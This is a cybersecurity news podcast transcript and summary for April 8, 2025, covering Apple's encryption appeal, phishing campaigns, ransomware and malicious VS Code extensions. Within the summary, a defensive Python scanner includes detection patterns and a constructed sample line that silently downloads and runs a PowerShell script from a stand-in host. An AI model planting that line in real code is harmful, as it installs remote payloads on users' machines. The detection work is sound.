
A
From the CISO series, it's Cybersecurity Headlines.
B
These are the cybersecurity headlines for Tuesday, April 8, 2025. I'm Rich Stroffolino.

Apple appeals UK encryption backdoor order
The UK's Investigatory Powers Tribunal, or IPT, confirmed Apple filed an appeal on an order that would require it to create a backdoor in its Advanced Data Protection feature as part of its cloud storage. We know this because the IPT refused an application by the British government to keep secret even the bare details of the case, including the identity of any filing parties, under the argument that disclosure could damage national security. The Financial Times reported that Apple appealed the order, but now we have official confirmation. A hearing on the appeal was already held last month in London, but no media access was permitted.

Researchers warn about AI-driven hacking tool
Researchers at SlashNext published details about Xanthorox AI, a modular AI-driven hacking tool first spotted on hacker forums last month. Xanthorox uses five operational models to handle code generation, vulnerability exploitation and data analysis, and integrates voice and image processing, making it capable of both automated and interactive attacks. Previous AI-based tools we've covered, like WormGPT, used jailbreaks or workarounds to run on existing LLMs. But Xanthorox runs on a self-contained architecture on dedicated servers, with its operators claiming it runs a custom LLM.

PoisonSeed campaign weaponizes CRM systems
Researchers at Silent Push found a new campaign that uses customer relationship management and bulk email systems to send out phishing emails containing crypto seed phrases to potential victims. These emails claim to come from Coinbase, urging users with self-custodial wallets to transfer assets. The seed phrases are included in transfer instructions for setting up the new wallets, which would then grant threat actors access to them. It's estimated that Coinbase users have lost roughly $46 million in crypto assets since mid-March. The campaign has used a variety of providers to spam people, including HubSpot, Mailchimp, Mailgun, SendGrid and Zoho.

Everest ransomware site goes offline
The darknet leak site for the Russian-speaking ransomware group Everest went offline on April 7 after being defaced over the weekend. Before going dark, the site was changed to read "Don't do crime, crime is bad. Xoxo from Prague." It's unclear if the site going dark came from activity by law enforcement, an exit scam by the group itself, or another third party. Everest was previously linked to an attack on the cannabis dispensary Stiiizy back in November. Ironically, it's now Everest that appears to have gone up in smoke.

And now, thanks to today's episode sponsor, Nudge Security. Who's using AI tools in your org? Find out today with Nudge Security. Nudge Security discovers every GenAI tool ever used in your org, even those you've never heard of. For each tool, you'll see who introduced it, who else is using it, where it's integrated into other tools and how, and a vendor security profile. Visit nudgesecurity.com/ai to get your free GenAI inventory today. That's N-U-D-G-E-S-E-C-U-R-I-T-Y.com/ai.

WK Kellogg feeling soggy after Clop-linked data breach
In late 2024, the Clop ransomware group targeted vulnerabilities in the managed file transfer utility Cleo. We covered it extensively on this show. In a notice with Maine's Attorney General, the food giant W.K. Kellogg said it learned of a potential security incident due to the Cleo breach on February 27, 2025, ultimately tracing it back to unauthorized access. On December 7, the company used Cleo for transferring employee files to a human resources vendor, and the breach exposed employee names and Social Security numbers. W.K. Kellogg will offer impacted employees the now obligatory one year of credit monitoring services.

State-backed actors could have exploited ESET flaw
The cybersecurity firm ESET confirmed a flaw reported by Kaspersky researchers that could be used by threat actors to plant a malicious DLL and execute it in ESET's antivirus scanner to bypass system defenses. ESET patched the issue and maintains it didn't find any evidence of it being exploited in the wild. However, Kaspersky researchers claim that the suspected state-backed threat group ToddyCat used the flaw in a campaign using a modified version of EDRSandBlast to load a malicious DLL under the name TCESB to execute payloads. ESET said it hasn't seen the suspected DLLs to review them, but regardless, the approach would have required admin privileges to perform the attack.

Crypto miners pose as VS Code extensions
ExtensionTotal researcher Yuval Ronen discovered nine extensions on Microsoft's VS Code Marketplace that attempt to fetch a PowerShell script from an external source to install a crypto miner. These malicious extensions pose as tools for popular services like Discord, Roblox, Claude AI and ChatGPT, or as compilers for various programming languages. These extensions have been installed 300,000 times, although this count has likely been manipulated to make them appear more legitimate. ExtensionTotal reported the extensions to Microsoft, but they are still on the marketplace as of this recording.

Threat actors posing as Ukrainian drone companies
Ukraine's Computer Emergency Response Team, CERT-UA, began tracking a campaign in February in which threat actors pose as drone manufacturers and state agencies to infect systems with info stealers. They approach victims with emails carrying malicious attachments, sent from compromised accounts under subject lines typical for drone operators, things like "Mine Discovery." Once infected, the campaign uses GiftedCrook malware to steal browser data and exfiltrate it to Telegram. CERT-UA didn't attribute the campaign to any previously known threat group, tracking them under the designation UAC-0226.

Most of our tools are getting an AI upgrade whether we like it or not. Going AI is seen as a means to stay competitive. The increased productivity also requires increased scrutiny. Traditional security penetration testing efforts suddenly look very different when dealing with an LLM. That's one of the problems we'll be trying to address on our latest episode of the CISO Series Podcast. Look for "With AI, Don't Think Like a Hacker, Think Like the Whole of Society" wherever you get your podcasts, or head on over to cisoseries.com. Reporting for the CISO Series, I'm Rich Stroffolino reminding you to have a super sparkly day.
A
Cybersecurity headlines are available every weekday. Head to cisoseries.com for the full stories behind the headlines.
Cyber Security Headlines – April 8, 2025 Hosted by CISO Series
Timestamp: [00:06]
In the latest cybersecurity developments, Apple has officially appealed a UK government order mandating the creation of a backdoor in its Advanced Data Protection feature for iCloud storage. This became public after the UK's Investigatory Powers Tribunal (IPT) refused a British government application to keep even the basic details of the case secret, an application the government had justified on national security grounds.
Rich Stroffolino reported, “Apple filed an appeal on an order that would require it to create a backdoor in its advanced data protection feature as part of its cloud storage” (00:06). This legal battle underscores the ongoing tension between privacy advocates and governmental agencies seeking access to encrypted data for security purposes. The hearing for Apple's appeal took place last month in London without media access, highlighting the sensitive nature of the case.
Timestamp: [01:30]
The cybersecurity community is bracing for a new AI-driven hacking tool named Xanthorox, as detailed by researchers at SlashNext. Unlike previous AI-based tools that relied on existing Large Language Models (LLMs) through jailbreaks or workarounds, Xanthorox reportedly operates on a self-contained architecture using dedicated servers and what its operators claim is a custom LLM.
Rich Stroffolino elaborated, “Xanthorox uses five operational models to handle code generation, vulnerability exploitation, data analysis, and integrates voice and image processing, making it capable of both automated and interactive attacks” (01:30). This modular approach allows Xanthorox to execute complex and coordinated cyberattacks, posing a significant threat to information security systems worldwide.
Timestamp: [03:00]
A new malicious campaign dubbed "PoisonSeed" has been identified by Silent Push researchers. It abuses Customer Relationship Management (CRM) and bulk email systems to distribute phishing emails that impersonate Coinbase and urge users with self-custodial wallets to transfer their crypto assets. The emails embed attacker-controlled seed phrases in the transfer instructions, so any wallet a victim sets up from them is under the attackers' control.
Rich Stroffolino stated, “It's estimated that Coinbase users have lost roughly $46 million in crypto assets since mid-March” (03:00). The campaign leverages various providers, including HubSpot, Mailchimp, Mailgun, SendGrid, and Zoho, to disseminate the phishing emails at scale, significantly increasing the campaign's reach and potential impact.
Timestamp: [04:20]
The darknet leak site associated with the Russian-speaking ransomware group Everest has gone offline as of April 7, following a defacement incident over the weekend. Before disappearing, the site displayed a message condemning criminal activities: “don't do crime, Crime is bad. Xoxo from Prague.”
Rich Stroffolino highlighted, “It's unclear if the site going dark came from activity by law enforcement, an exit scam by the group itself or another third party” (04:20). Everest was previously linked to the attack on the cannabis dispensary Stiiizy in November; who took the site down, and whether it will return, has not been established.
Timestamp: [05:15]
W.K. Kellogg has disclosed a security incident stemming from the Clop ransomware group's exploitation of vulnerabilities in the managed file transfer software Cleo, which Kellogg used to transfer employee files to a human resources vendor. The company learned of the incident on February 27, 2025; the compromised data included employee names and Social Security numbers.
Rich Stroffolino reported, “W.K. Kellogg will offer impacted employees the now obligatory one year of credit monitoring services” (05:15). The company traced the breach back to unauthorized access via Cleo on December 7, highlighting the persistent risks associated with third-party software vulnerabilities.
Timestamp: [06:30]
Cybersecurity firm ESET has patched a flaw in its antivirus scanner that could let an attacker plant a malicious DLL and have the scanner execute it, bypassing system defenses. The flaw was reported by Kaspersky researchers, who say the suspected state-backed threat group ToddyCat exploited it using a modified version of the EDRSandBlast tool.
Rich Stroffolino noted, “ESET patched the issue and maintains it didn't find any evidence of it being exploited in the wild” (06:30). ESET also says it has not seen the DLLs in question, and the technique requires administrative privileges to begin with, so it serves an attacker who already holds elevated access rather than providing an initial foothold.
Timestamp: [07:10]
Yuval Ronen, a researcher at ExtensionTotal, uncovered nine malicious extensions on Microsoft's VS Code Marketplace that try to fetch a PowerShell script from an external server to install a crypto miner. These extensions masquerade as tools for popular services like Discord, Roblox, Claude AI, and ChatGPT, or as compilers for various programming languages.
Rich Stroffolino explained, “These malicious extensions pose as tools for popular services... have been installed 300,000 times, although this likely has been used to make them appear more legitimate” (07:10). Despite reporting the malicious extensions to Microsoft, they remained available on the marketplace at the time of the podcast recording, highlighting challenges in swiftly addressing such threats.
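After a report like this, the check a practitioner wants is a quick sweep of the extensions already installed on developer machines for code that shells out to PowerShell to fetch and run something from a remote server. The Python below is an added example written for this summary, not ExtensionTotal's tooling; the extension directories, the indicator patterns and the two sample extensions it scans are assumptions constructed for illustration, and simple heuristics like these will miss obfuscated loaders.

```python
"""Heuristic check for VS Code extensions that shell out to PowerShell to
fetch and run a remote script. Added example for this page; it is not
ExtensionTotal's tooling. Extension paths, the pattern list and the sample
extensions below are assumptions / constructed for illustration."""
import re
import tempfile
from pathlib import Path

# Indicators with little legitimate reason to appear in an extension bundle
# (assumption: tune the list for your environment).
SUSPICIOUS_PATTERNS = [
    re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I),
    re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I),
    re.compile(r"powershell(\.exe)?[^\n]*-(enc|encodedcommand|ep\s+bypass|w\s+hidden)", re.I),
    re.compile(r"(child_process|spawn|exec)[^\n]{0,80}powershell", re.I),
]
SCANNED_SUFFIXES = {".js", ".ts", ".mjs", ".cjs", ".ps1", ".cmd", ".bat", ".json"}
# Where VS Code keeps user-installed extensions (assumption; adjust per OS).
DEFAULT_EXT_DIRS = [Path.home() / ".vscode" / "extensions",
                    Path.home() / ".vscode-server" / "extensions"]


def scan_file(path: Path) -> list[tuple[int, str]]:
    """Return (line number, excerpt) for every line matching an indicator."""
    hits = []
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return hits
    for lineno, line in enumerate(text.splitlines(), 1):
        if any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            hits.append((lineno, line.strip()[:120]))
    return hits


def scan_extensions(ext_dirs=None) -> dict[str, list[tuple[str, int, str]]]:
    """Map extension folder name -> [(relative file, line, excerpt)] for
    every extension that contains at least one indicator."""
    findings = {}
    for base in ext_dirs or DEFAULT_EXT_DIRS:
        if not base.is_dir():
            continue
        for ext in sorted(p for p in base.iterdir() if p.is_dir()):
            hits = []
            for f in ext.rglob("*"):
                # Skip vendored node_modules: noisy, and in this campaign the
                # downloader lives in the extension's own entry point.
                if f.suffix in SCANNED_SUFFIXES and "node_modules" not in f.parts:
                    hits += [(str(f.relative_to(ext)), n, s) for n, s in scan_file(f)]
            if hits:
                findings[ext.name] = hits
    return findings


# Constructed sample extensions: one ordinary, one that downloads and runs a
# PowerShell script the way the reported extensions did (no real URL used).
BENIGN_JS = """const vscode = require("vscode");
function activate() { vscode.window.showInformationMessage("hello"); }
module.exports = { activate };
"""
MALICIOUS_JS = """const { exec } = require("child_process");
function activate() {
  exec('powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString(\\'http://example.invalid/m.ps1\\')"');
}
module.exports = { activate };
"""


def build_sample_tree(root: Path) -> None:
    """Lay out the two constructed extensions like the real extensions folder."""
    for name, body in (("publisher.helper-1.0.0", BENIGN_JS),
                       ("publisher.discord-tools-2.3.1", MALICIOUS_JS)):
        ext = root / name
        ext.mkdir(parents=True)
        (ext / "package.json").write_text('{"main": "./extension.js"}')
        (ext / "extension.js").write_text(body)


def demo() -> dict[str, list[tuple[str, int, str]]]:
    """Scan the constructed tree instead of the real extension folders."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        return scan_extensions([Path(tmp)])


if __name__ == "__main__":
    for ext_name, hits in demo().items():
        print(ext_name)
        for rel, lineno, excerpt in hits:
            print(f"  {rel}:{lineno}: {excerpt}")
```

Calling `scan_extensions()` with no arguments sweeps the assumed default folders on the current machine; `demo()` runs the same logic over the constructed tree and flags only the fake Discord extension. Treat hits as leads for a manual look at the extension, not as a verdict, and pair this with the marketplace-side controls (allow lists, install counts you don't trust) the story itself argues for.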
Timestamp: [08:45]
Ukraine's Computer Emergency Response Team, CERT-UA, has been tracking a campaign since February in which threat actors impersonate drone manufacturers and state agencies to deploy info-stealing malware. The campaign begins with phishing emails carrying malicious attachments, sent from compromised accounts under subject lines relevant to drone operations, such as “Mine Discovery.”
Rich Stroffolino detailed, “Once infected, the campaign uses GiftedCrook malware to steal browser data and exfiltrate it to Telegram” (08:45). This campaign, designated UAC-0226 because CERT-UA has not tied it to a known group, underscores how threat actors use industry-specific impersonation to gain unauthorized access and extract sensitive information.
The April 8, 2025 episode of Cyber Security Headlines by the CISO Series underscores the dynamic and multifaceted nature of today's cybersecurity landscape. From legal battles over encryption and the emergence of AI-driven hacking tools to sophisticated phishing campaigns and ransomware activities, the episode provides a comprehensive overview of the current threats and challenges facing information security professionals.
Rich Stroffolino emphasizes the relentless evolution of cyber threats, particularly with the integration of AI technologies, stating, “Most of our tools are getting an AI upgrade whether we like it or not” (09:50). This progression necessitates heightened vigilance and innovative security measures to protect against increasingly complex and automated attacks.
For more detailed stories and in-depth analysis, listeners are encouraged to visit CISOSeries.com.